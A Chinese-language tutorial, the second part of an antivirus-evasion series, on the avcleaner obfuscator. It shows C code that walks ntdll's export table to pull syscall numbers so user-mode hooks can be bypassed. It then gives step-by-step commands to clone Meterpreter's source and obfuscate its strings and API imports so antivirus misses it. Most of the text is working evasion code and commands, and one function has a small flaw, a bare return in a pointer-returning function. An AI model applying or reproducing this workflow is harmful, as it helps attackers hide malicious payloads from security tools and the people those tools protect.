免杀基础–免杀工具avcleaner(二)
—实战篇
0x00 介绍
avcleaner是一个针对C/C++源码 obfuscator。主要针对两个方面实现免杀功能:
- 字符串混淆传递
- API 导入隐藏/系统调用重写详细介绍请阅读 免杀基础–免杀工具avcleaner(一)
0x01 获取系统调用
为了实现对抗用户空间的hook,采用syscall的方式。作者并未采用现成的汇编形式,如采用SysWhisper2方式,而是代码中动态获取需要函数的调用号。这样可以减小代码的体积,减少特征。
1. 获取ntdll.dll的导出表
static PIMAGE_EXPORT_DIRECTORY get_export_dir(LPBYTE file_buffer, DWORD file_size, PIMAGE_SECTION_HEADER *first_section, DWORD* nb_sections) {
PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)file_buffer;
// sanitity check
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
return;
}
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(file_buffer + dos_header->e_lfanew);
*nb_sections = nt_header->FileHeader.NumberOfSections;
*first_section = (PIMAGE_SECTION_HEADER) (file_buffer + dos_header->e_lfanew +sizeof(IMAGE_NT_HEADERS));
DWORD export_rva = nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
// The field VirtualAddress needs a quick conversion in case the target is accessed in the file directly
DWORD export_file_offset = rva_to_file_offset(*first_section, *nb_sections, file_size, export_rva);
return (PIMAGE_EXPORT_DIRECTORY)(file_buffer + export_file_offset);
}2. 遍历导出表获取导出函数名
PIMAGE_SECTION_HEADER first_section; // first section's header, points to an array of sections headers.
DWORD nb_sections = 0; // number of sections in ntdll
PIMAGE_EXPORT_DIRECTORY export_directory = get_export_dir(file_buffer, file_size, &first_section, &nb_sections);
PDWORD functions_address = (PDWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfFunctions));
PWORD ordinals_address = (PWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfNameOrdinals));
PDWORD names_address = (PDWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfNames));
SIZE_T nb_api_names = sizeof(__API_names) / sizeof(__API_names[0]);
syscall_infos = (syscall_info*)malloc(nb_api_names * sizeof(syscall_info));
for (DWORD i = 0; i < export_directory->NumberOfNames; ++i)
{
DWORD rva_api = functions_address[ordinals_address[i]];
DWORD file_offset_name = rva_to_file_offset(first_section, nb_sections, file_size, names_address[i]);
unsigned char* name = file_buffer + file_offset_name;
// filter everything except Zw* API functions
if (!(*name == 'Z' && *(name + 1) == 'w'))
continue;3. 获取syscall的编号
windbg > u NtCreateFile
ntdll!NtCreateFile:
00007ffa`202458e0 4c8bd1 mov r10,rcx
00007ffa`202458e3 b855000000 mov eax,55h
00007ffa`202458e8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffa`202458f0 7503 jne ntdll!NtCreateFile+0x15 (00007ffa`202458f5)
00007ffa`202458f2 0f05 syscall
00007ffa`202458f4 c3 ret
00007ffa`202458f5 cd2e int 2Eh
00007ffa`202458f7 c3 ret以上汇编代码中mov eax,55h,给eax赋值的0x55就是NtCreateFile的syscall调用编号。编号相对于函数开头偏移4个字节,以此可以获取其它的函数的syscall调用编号并存于syscall_infos结构体数组中。
// get the syscall id
DWORD syscall_id = *(DWORD *)(procedure_address + SYSCALL_ID_OFFSET);
// compare with the APIs we're interested in
for (unsigned int i = 0; i < nb_api_names; i++) {
if (strequal(__API_names[i], (const char*)name)) {
syscall_infos[i].name = __API_names[i];
syscall_infos[i].id = syscall_id;
break;
}
}0x02 实战 Meterpreter
得益于作者提供的docker环境,可使用docker快速搭建工具环境。
docker build . -t avcleaner
docker run -v [path to avcleaner]:/home/toto -it avcleaner bash# 创建临时编译目录
export TMP_DIR=$(mktemp -d)
echo "Building in $TMP_DIR"
cd $TMP_DIR
# 从github下载meterpreter源码
git clone https://github.com/rapid7/metasploit-payloads
cd metasploit-payloads
git submodule update --init --recursive针对meterpreter源码,可以简单使用*/.c | xargs avcleaner处理所有的c文件,当然也可以使用作者提供的脚本(avcleaner/scripts/obfuscate_meterpreter_macos.py)处理。
根据自己环境修改avcleaner/scripts/obfuscate_meterpreter_macos.py中的如下的路径变量。
AVCLEANER_PATH
PATCH_SYSCALL_PATH
WIN_INCLUDE
CLANG_PATH接着执行:
cd c/meterpreter
# 通过python3脚本运行我们的混淆工具
python3 avcleaner/scripts/obfuscate_meterpreter_macos.py -p "$TMP_DIR/c/meterpreter/source" --edit --api --strings
make docker-x640x03 演示
0x04 参考
作者为这个项目编写的blog
